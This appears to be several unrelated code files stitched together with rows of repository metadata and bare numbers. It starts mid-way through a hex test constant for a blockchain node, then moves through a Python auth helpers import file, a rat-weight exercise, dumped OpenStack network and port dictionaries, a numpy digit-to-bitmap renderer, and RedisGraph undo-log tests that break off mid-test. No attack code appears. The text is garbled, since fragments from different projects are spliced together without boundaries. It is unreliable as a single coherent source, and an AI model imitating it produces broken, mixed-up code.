70af0fc897bc2cadc96bffacf261af85398b6cc72dd4241a04c48a2e08ebb80b1f585b628482004697da24e2d75543472d75d5f27607808fd8eef3da8e941536dd96fd5366f1026fe4e85b489be32663a05519706c4e390e6ef3d64466cee46058694eacd3305bc33e66b3317eb849768107cf52320f309df9265131bfa043dcda7ae8288fe3637d6b28f60d7c0bbcd5e6eaa14e9e15ed214e353d58a84bd623d95328b811cfab334fa4cd6ab0386c779b00caf4d2199a40993dcf0b7df287cf746e4954029d8eb432bb62d8135c50f966088b996538b9205ccd56a9f6af73f565b1ec816067b6b86ffca4f2722344fb3d0bdd7a396d2879b128a54357e110e016c36498b39fa26c40afbd2f342b89b134e3324cdc79fcbff14430be55763d0ea0f6f723fac1cfaad11e535b1b52f80a4e0919896512e2c42ebfef8e5c08c42dd4f2169e6fc94e3d529ae64fa5c5e184d670f6afa36bcac9d5431a132f2a9c5520009898c347c415e4e4b6d2ec0eb39fb41e3c8e89af040ee02f4fa732aff1102e23e0ea5c03372e0c097c16f8aea6ea719e698585105e7435365e08357a0f1340aaaab7cd8ab2a27c584a68227319202cd1a966e92a087c03085c56fd3214ccd10a31cc9cfecaafb5789b653b02335f13012ca3cec9bbf3561cba7a6894dbf343e42e92a76a83e7454ad2d8751e9cfdd62ea63df19a1359e62e1112a22df890706ddefd30c9f1a5882792827ef120f2e93039bd95f1ba3bcb0ceb41e7202'
purss_sign_expected2_h = 4
hashchain_reveal_input = hstr2bin('32eee808dc7c5dfe26fd4859b415e5a713bd764036bbeefd7a541da9a1cc7b9fcaf17da039a62756b63835de1769e05e')
hashchain_reveal_expected1 = '1d607de5dc840ca31b6cdc8aa2a0c5e7158396b27103a3a128c97994d33e3fce'
message_example = 'ff00003030303030303065007b2274797065223a20224d42227d0000ffff00003030303030303261007b2274797065223a2022504c222c202264617461223a20225b5c223137322e31382e302e365c225d227d0000ffff00003030303030303065007b2274797065223a20225645227d0000ffff00003030303030306434007b2274797065223a20224342222c202264617461223a20227b5c22626c6f636b5f6e756d6265725c223a20302c205c22686561646572686173685c223a205b35332c203133302c203136382c2035372c203138332c203231352c203132302c203137382c203230392c2033302c203139342c203232332c203232312c2035382c2037322c203132342c2036322c203134382c203131302c2038312c2031392c203138392c2032372c203234332c203231382c2038372c203231372c203230332c203139382c2039372c2038342c2031395d7d227d0000ffff00003030303030303635007b2274797065223a20225645222c202264617461223a20227b5c2267656e657369735f707265765f686561646572686173685c223a205c2243727970746f6e69756d5c222c205c2276657273696f6e5c223a205c22616c7068612f302e3435615c227d227d0000ff'
| 321.925
| 4,641
| 0.970956
| 251
| 12,877
| 49.665339
| 0.776892
| 0.004171
| 0.002086
| 0.002727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.590941
| 0.015842
| 12,877
| 40
| 4,642
| 321.925
| 0.392725
| 0.01126
| 0
| 0
| 0
| 0.181818
| 0.945322
| 0.913347
| 0
| 1
| 0.001885
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0.045455
| 0.136364
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3d78138747dbd0fd06cdd2b94c6713f8393812d
| 135
|
py
|
Python
|
backend/app/helpers/auth/__init__.py
|
shvixxl/tablic
|
3ca2f026d84fab9692e7e5adde74a9716266ff5e
|
[
"MIT"
] | 2
|
2021-02-05T16:55:41.000Z
|
2021-02-07T21:46:37.000Z
|
backend/app/helpers/auth/__init__.py
|
shvixxl/tablic
|
3ca2f026d84fab9692e7e5adde74a9716266ff5e
|
[
"MIT"
] | 1
|
2021-10-30T15:42:53.000Z
|
2021-10-30T15:42:53.000Z
|
backend/app/helpers/auth/__init__.py
|
shvixxl/tablic
|
3ca2f026d84fab9692e7e5adde74a9716266ff5e
|
[
"MIT"
] | null | null | null |
"""Auth helpers."""
from .password import generate_password_hash, check_password_hash
from .token import generate_token, verify_token
| 27
| 65
| 0.822222
| 18
| 135
| 5.833333
| 0.555556
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096296
| 135
| 4
| 66
| 33.75
| 0.860656
| 0.096296
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
c3dede7ab5e4f456d29dfa3cbda46e46e631678e
| 712
|
py
|
Python
|
chapter-09/exercise008.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-09/exercise008.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-09/exercise008.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
rat_1 = [1,2,3,4,5,6,7,8,9,10]
rat_2 = [11,12,13,14,15,16,17,18,19,20]
if rat_1[0] > rat_2[0]:
print("Rat 1 weighed more than rat 2 on day 1.")
else:
print("Rat 1 weighed less than rat 2 on day 1.")
if (rat_1[0] > rat_2[0]) and (rat_1[9] > rat_2[9]):
print("Rat 1 remained heavier than Rat 2.")
elif (rat_1[0] > rat_2[0]) and (rat_1[9] < rat_2[9]):
print("Rat 2 became heavier than Rat 1.")
print('and now, nested')
if rat_1[0] > rat_2[0]:
print("Rat 1 weighed more than rat 2 on day 1.")
if rat_1[9] > rat_2[9]:
print("Rat 1 remained heavier than Rat 2.")
else:
print("Rat 2 became heavier than Rat 1.")
else:
print("Rat 1 weighed less than rat 2 on day 1.")
| 29.666667
| 53
| 0.606742
| 156
| 712
| 2.666667
| 0.24359
| 0.153846
| 0.129808
| 0.076923
| 0.846154
| 0.846154
| 0.846154
| 0.846154
| 0.723558
| 0.713942
| 0
| 0.146739
| 0.224719
| 712
| 23
| 54
| 30.956522
| 0.606884
| 0
| 0
| 0.684211
| 0
| 0
| 0.425562
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.473684
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c3e1c2c6c7618f8ada842bd0d09ec67ddd4226f9
| 9,294
|
py
|
Python
|
src/openstackapi/network_meta.py
|
jiangyt2112/NetworkMonitor
|
f59944add504c6a081a4434b7f027472e6679e29
|
[
"Apache-2.0"
] | null | null | null |
src/openstackapi/network_meta.py
|
jiangyt2112/NetworkMonitor
|
f59944add504c6a081a4434b7f027472e6679e29
|
[
"Apache-2.0"
] | null | null | null |
src/openstackapi/network_meta.py
|
jiangyt2112/NetworkMonitor
|
f59944add504c6a081a4434b7f027472e6679e29
|
[
"Apache-2.0"
] | null | null | null |
{'networks':
[
{u'provider:physical_network': None,
u'port_security_enabled': True,
u'provider:network_type': u'vxlan',
u'id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'router:external': False,
u'availability_zone_hints': [],
u'availability_zones': [u'nova'],
u'ipv4_address_scope': None,
u'shared': False,
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'subnets': [u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b'],
u'description': u'',
u'tags': [],
u'updated_at': u'2018-10-26T09:33:23Z',
u'provider:segmentation_id': 73,
u'name': u'int-net',
u'admin_state_up': True,
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:33:23Z',
u'mtu': 1450
},
{u'provider:physical_network': u'extnet',
u'ipv6_address_scope': None,
u'revision_number': 4,
u'port_security_enabled': True,
u'provider:network_type': u'flat',
u'id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'router:external': True,
u'availability_zone_hints': [],
u'availability_zones': [u'nova'],
u'ipv4_address_scope': None,
u'shared': True,
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'subnets': [u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a'],
u'description': u'',
u'tags': [],
u'updated_at': u'2018-10-26T09:35:20Z',
u'is_default': False,
u'provider:segmentation_id': None,
u'name': u'ext-net',
u'admin_state_up': True,
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:19Z',
u'mtu': 1500}
]
}
{'subnets':
[
{u'host_routes': [],
u'service_types': [],
u'description': u'',
u'enable_dhcp': True,
u'tags': [],
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:33:23Z',
u'dns_nameservers': [],
u'updated_at': u'2018-10-26T09:33:23Z',
u'ipv6_ra_mode': None,
u'allocation_pools': [{u'start': u'192.168.1.2', u'end': u'192.168.1.254'}],
u'gateway_ip': u'192.168.1.1',
u'revision_number': 0,
u'ip_version': 4,
u'ipv6_address_mode': None,
u'cidr': u'192.168.1.0/24',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b',
u'subnetpool_id': None,
u'name': u'int-sub'
},
{u'host_routes': [],
u'service_types': [],
u'description': u'',
u'enable_dhcp': False,
u'tags': [],
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:20Z',
u'dns_nameservers': [],
u'updated_at': u'2018-10-26T09:35:20Z',
u'ipv6_ra_mode': None,
u'allocation_pools': [{u'start': u'192.168.166.20', u'end': u'192.168.166.40'}],
u'gateway_ip': u'192.168.166.1',
u'revision_number': 0,
u'ip_version': 4,
u'ipv6_address_mode': None,
u'cidr': u'192.168.166.0/24',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a',
u'subnetpool_id': None,
u'name': u'ext-sub'}
]
}
{'ports':
[
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:33:27Z',
u'device_owner': u'network:dhcp',
u'revision_number': 5,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [
{u'subnet_id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b',
u'ip_address': u'192.168.1.2'
}
],
u'id': u'3e25711d-884a-413a-a9e3-06b4f9225117',
u'security_groups': [],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:d0:20:d1',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'dhcp280b4426-d1ca-5484-9f17-9aa7c0b012c5-956df7c4-25d9-4564-8b81-843462ae707a',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:33:24Z',
u'binding:vnic_type': u'normal'
},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:36:45Z',
u'device_owner': u'compute:nova',
u'revision_number': 6,
u'port_security_enabled': True,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b', u'ip_address': u'192.168.1.8'}],
u'id': u'3ef787ad-6748-4b58-87a1-6af1441cc947',
u'security_groups': [u'a0e3eb1d-413a-4c5d-95dd-752ebd7991c5'],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:5d:9e:22',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'61205745-b2bf-4db0-ad50-e7a60bf08bd5',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:36:41Z',
u'binding:vnic_type': u'normal'
},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:36:01Z',
u'device_owner': u'network:router_interface',
u'revision_number': 7,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b', u'ip_address': u'192.168.1.1'}],
u'id': u'661bb3c3-3651-40e7-9728-19c2565e2149',
u'security_groups': [],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:84:7c:ec',
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'd4edac45-231a-4b5e-9e95-c629d5c7fc62',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'956df7c4-25d9-4564-8b81-843462ae707a',
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:56Z',
u'binding:vnic_type': u'normal'
},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T10:01:30Z',
u'device_owner': u'network:floatingip',
u'revision_number': 4,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a', u'ip_address': u'192.168.166.23'}],
u'id': u'ad4dcecc-2d8b-4021-b2f0-46cacf6917f8',
u'security_groups': [],
u'binding:vif_details': {},
u'binding:vif_type': u'unbound',
u'mac_address': u'fa:16:3e:c0:6c:33',
u'project_id': u'',
u'status': u'N/A',
u'binding:host_id': u'',
u'description': u'',
u'tags': [],
u'device_id': u'ff32223d-db9f-4b41-b647-5daf9aa69f82',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'tenant_id': u'',
u'created_at': u'2018-10-26T10:01:30Z',
u'binding:vnic_type': u'normal'},
{u'allowed_address_pairs': [],
u'extra_dhcp_opts': [],
u'updated_at': u'2018-10-26T09:35:43Z',
u'device_owner': u'network:router_gateway',
u'revision_number': 6,
u'port_security_enabled': False,
u'binding:profile': {},
u'fixed_ips': [{u'subnet_id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a', u'ip_address': u'192.168.166.28'}],
u'id': u'b8cfeaad-eff1-4687-8109-3120102323c8',
u'security_groups': [],
u'binding:vif_details': {u'port_filter': True, u'datapath_type': u'system', u'ovs_hybrid_plug': True},
u'binding:vif_type': u'ovs',
u'mac_address': u'fa:16:3e:4d:46:a6',
u'project_id': u'',
u'status': u'ACTIVE',
u'binding:host_id': u'control-node',
u'description': u'',
u'tags': [],
u'device_id': u'd4edac45-231a-4b5e-9e95-c629d5c7fc62',
u'name': u'',
u'admin_state_up': True,
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'tenant_id': u'',
u'created_at': u'2018-10-26T09:35:38Z',
u'binding:vnic_type': u'normal'
}
]
}
{'routers':
[
{
u'status': u'ACTIVE',
u'external_gateway_info':
{
u'network_id': u'f89e858b-b386-47b5-b987-7a70bd72e861',
u'enable_snat': True,
u'external_fixed_ips':
[
{
u'subnet_id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a',
u'ip_address': u'192.168.166.28'
}
]
},
u'availability_zone_hints': [],
u'availability_zones': [u'nova'],
u'description': u'',
u'tags': [],
u'tenant_id': u'a95424bbdca6410092073d564f1f4012',
u'created_at': u'2018-10-26T09:35:38Z',
u'admin_state_up': True,
u'distributed': False,
u'updated_at': u'2018-10-26T09:35:56Z',
u'ha': False,
u'flavor_id': None,
u'revision_number': 4,
u'routes': [],
u'project_id': u'a95424bbdca6410092073d564f1f4012',
u'id': u'd4edac45-231a-4b5e-9e95-c629d5c7fc62',
u'name': u'R'
}
]
}
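# Illustrative sketch: the captured responses above are bare dict literals and are
# not bound to names in this file, so the trimmed copies below (ids, names and
# CIDRs taken from the data above) show one way to join each network to its
# subnet CIDRs via the 'subnets' id list.
networks = [
    {'id': u'956df7c4-25d9-4564-8b81-843462ae707a', 'name': u'int-net',
     'subnets': [u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b']},
    {'id': u'f89e858b-b386-47b5-b987-7a70bd72e861', 'name': u'ext-net',
     'subnets': [u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a']},
]
subnets = [
    {'id': u'3761ef2d-d30c-46b4-8d03-ae38c411ab5b', 'name': u'int-sub', 'cidr': u'192.168.1.0/24'},
    {'id': u'4d0f1eb6-16ef-4353-874a-0fe48b707e2a', 'name': u'ext-sub', 'cidr': u'192.168.166.0/24'},
]
subnet_by_id = {s['id']: s for s in subnets}

for net in networks:
    cidrs = [subnet_by_id[sid]['cidr'] for sid in net['subnets']]
    print('%s -> %s' % (net['name'], ', '.join(cidrs)))
# prints:
#   int-net -> 192.168.1.0/24
#   ext-net -> 192.168.166.0/24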
| 33.919708
| 110
| 0.646546
| 1,426
| 9,294
| 4.04979
| 0.165498
| 0.028052
| 0.024242
| 0.031169
| 0.855065
| 0.836883
| 0.795152
| 0.768139
| 0.705974
| 0.701126
| 0
| 0.195794
| 0.155907
| 9,294
| 274
| 111
| 33.919708
| 0.540344
| 0
| 0
| 0.553903
| 0
| 0
| 0.615062
| 0.240237
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7f17b49a3427776c186fc1ddfd58e65fa50dd5ae
| 6,932
|
py
|
Python
|
dnd_gui/util/text.py
|
JStuckner/DnD-GUI-2
|
bf393c94e48df2e17113046b7f917ac2176ac8e8
|
[
"MIT"
] | null | null | null |
dnd_gui/util/text.py
|
JStuckner/DnD-GUI-2
|
bf393c94e48df2e17113046b7f917ac2176ac8e8
|
[
"MIT"
] | null | null | null |
dnd_gui/util/text.py
|
JStuckner/DnD-GUI-2
|
bf393c94e48df2e17113046b7f917ac2176ac8e8
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
def string_to_array(string, height=30, color=255):
array = np.zeros((height, 1))
size = int(round(height/10))
for i in range(len(string)):
nex = char_to_array(string[i],color)
nex = np.repeat(np.repeat(nex, size, axis=0), size, axis=1)
array = np.append(array, nex, axis=1)
return np.uint8(array)
def char_to_array(char, x=255):
if char == 'template':
return np.array([[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0]])
if char == ' ':
return np.array([[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0],
[0,0,0,0,0,0]])
if char == '0':
return np.array([[0,0,0,x,x,0,0,0],
[0,0,x,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,x,0,0,x,0,0],
[0,0,0,x,x,0,0,0]])
if char == '1':
return np.array([[0,0,0,x,0,0,0],
[0,0,x,x,0,0,0],
[0,x,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,0,0,x,0,0,0],
[0,x,x,x,x,x,0]])
if char == '2':
return np.array([[0,0,0,x,x,0,0,0],
[0,0,x,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,x,0,0],
[0,0,0,0,x,0,0,0],
[0,0,0,x,0,0,0,0],
[0,0,x,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,x,x,x,x,x,0]])
if char == '3':
return np.array([[0,0,0,x,x,0,0,0],
[0,0,x,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,x,x,x,0,0],
[0,0,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,x,0,0,0,x,0],
[0,0,0,x,x,x,0,0]])
if char == '4':
return np.array([[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,x,x,x,x,x,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0]])
if char == '5':
return np.array([[0,x,x,x,x,x,x,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,x,x,0,0,0],
[0,x,x,0,0,x,0,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,x,0,0,0,x,0,0],
[0,0,x,x,x,0,0,0]])
if char == '6':
return np.array([[0,0,0,0,0,x,x,0],
[0,0,0,0,x,0,0,0],
[0,0,0,x,0,0,0,0],
[0,0,x,0,0,0,0,0],
[0,0,x,x,x,0,0,0],
[0,x,0,0,0,x,0,0],
[0,x,0,0,0,0,x,0],
[0,x,0,0,0,0,x,0],
[0,0,x,0,0,x,0,0],
[0,0,0,x,x,0,0,0]])
if char == '7':
return np.array([[0,x,x,x,x,x,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,0,x,0],
[0,0,0,0,0,x,0,0],
[0,0,0,0,x,0,0,0],
[0,0,0,x,0,0,0,0],
[0,0,x,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0],
[0,x,0,0,0,0,0,0]])
if char == '8':
return np.array([[0,0,x,x,x,0,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,0,x,x,x,0,0],
[0,0,x,x,x,0,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,0,x,x,x,0,0]])
if char == '9':
return np.array([[0,0,x,x,x,0,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,0,x,x,x,x,0],
[0,0,0,0,0,x,0],
[0,0,0,0,0,x,0],
[0,0,0,0,x,0,0],
[0,0,0,x,0,0,0],
[0,x,x,0,0,0,0]])
if char == 'n':
return np.array([[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,x,0,x,x,0,0],
[0,x,x,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0],
[0,x,0,0,0,x,0]])
if char == 'm':
return np.array([[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,x,0,x,x,0,x,x,x,0,0],
[0,x,x,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0],
[0,x,0,0,0,x,0,0,0,x,0]])
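# Usage sketch (illustrative): render a short string to a bitmap array and display
# it with the matplotlib import already present at the top of this file. Only the
# characters that have bitmaps defined above (digits, space, 'n', 'm') are supported.
if __name__ == '__main__':
    demo = string_to_array('2018', height=30, color=255)
    plt.imshow(demo, cmap='gray')
    plt.axis('off')
    plt.show()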
| 39.386364
| 67
| 0.241344
| 1,264
| 6,932
| 1.318829
| 0.037184
| 0.841032
| 0.959208
| 0.974205
| 0.821836
| 0.814037
| 0.810438
| 0.791842
| 0.771446
| 0.767846
| 0
| 0.279163
| 0.531304
| 6,932
| 175
| 68
| 39.611429
| 0.233918
| 0
| 0
| 0.648485
| 0
| 0
| 0.00303
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012121
| false
| 0
| 0.012121
| 0
| 0.115152
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
7f187748d6821bde22d58e571f5e7d816927d12d
| 13,974
|
py
|
Python
|
tests/flow/test_undo_log.py
|
RedisLabsModules/redis-graph
|
2a56e350043ab6f08f7dfbf075e8fd3ced29cae9
|
[
"ISC",
"Apache-2.0",
"MIT",
"Ruby",
"BSD-3-Clause"
] | 313
|
2017-06-06T19:22:15.000Z
|
2018-11-02T09:42:37.000Z
|
tests/flow/test_undo_log.py
|
RedisLabsModules/redis-graph
|
2a56e350043ab6f08f7dfbf075e8fd3ced29cae9
|
[
"ISC",
"Apache-2.0",
"MIT",
"Ruby",
"BSD-3-Clause"
] | 107
|
2018-03-20T07:59:03.000Z
|
2018-11-01T22:04:39.000Z
|
tests/flow/test_undo_log.py
|
RedisLabsModules/redis-graph
|
2a56e350043ab6f08f7dfbf075e8fd3ced29cae9
|
[
"ISC",
"Apache-2.0",
"MIT",
"Ruby",
"BSD-3-Clause"
] | 30
|
2017-07-14T22:04:24.000Z
|
2018-10-28T03:17:50.000Z
|
from common import *
GRAPH_ID = "undo-log"
class testUndoLog():
def __init__(self):
self.env = Env(decodeResponses=True)
self.redis_con = self.env.getConnection()
self.graph = Graph(self.redis_con, GRAPH_ID)
def tearDown(self):
self.redis_con.flushall()
def test01_undo_create_node(self):
try:
self.graph.query("CREATE (n:N) WITH n RETURN 1 * 'a'")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# node (n:N) should be removed, expecting an empty graph
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 0)
def test02_undo_create_edge(self):
self.graph.query("CREATE (:N {v: 1}), (:N {v: 2})")
try:
self.graph.query("""MATCH (s:N {v: 1}), (t:N {v: 2})
CREATE (s)-[r:R]->(t)
WITH r
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# edge [r:R] should have been removed
result = self.graph.query("MATCH ()-[r:R]->() RETURN r")
self.env.assertEquals(len(result.result_set), 0)
def test03_undo_delete_node(self):
self.graph.query("CREATE (:N)")
try:
self.graph.query("""MATCH (n:N)
DELETE n
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted node should be revived, expecting a single node
result = self.graph.query("MATCH (n:N) RETURN n")
self.env.assertEquals(len(result.result_set), 1)
def test04_undo_delete_edge(self):
self.graph.query("CREATE (:N)-[:R]->(:N)")
try:
self.graph.query("""MATCH ()-[r:R]->()
DELETE r
WITH r
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# deleted edge should be revived, expecting a single edge
result = self.graph.query("MATCH ()-[r:R]->() RETURN r")
self.env.assertEquals(len(result.result_set), 1)
def test05_undo_update_node(self):
self.graph.query("CREATE (:N {a: 1, b:'str', c:[1, 'str', point({latitude:1, longitude:2})], d:point({latitude:1, longitude:2})})")
try:
self.graph.query("""MATCH (n:N {a: 1})
SET n.a = 2, n.b = '', n.c = null, n.d = point({latitude:2, longitude:1})
WITH n
RETURN 1 * 'a'""")
# we're not supposed to be here, expecting query to fail
self.env.assertTrue(False)
except:
pass
# expecting the original attributes to be restored
result = self.graph.query("MATCH (n:N) RETURN n.a, n.b, n.c, n.d")
self.env.assertEquals(result.result_set[0][0], 1)
self.env.assertEquals(result.result_set[0][1], 'str')
self.env.assertEquals(result.result_set[0][2], [1, 'str', {'latitude':1, 'longitude':2}])
self.env.assertEquals(result.result_set[0][3], {'latitude':1, 'longitude':2})
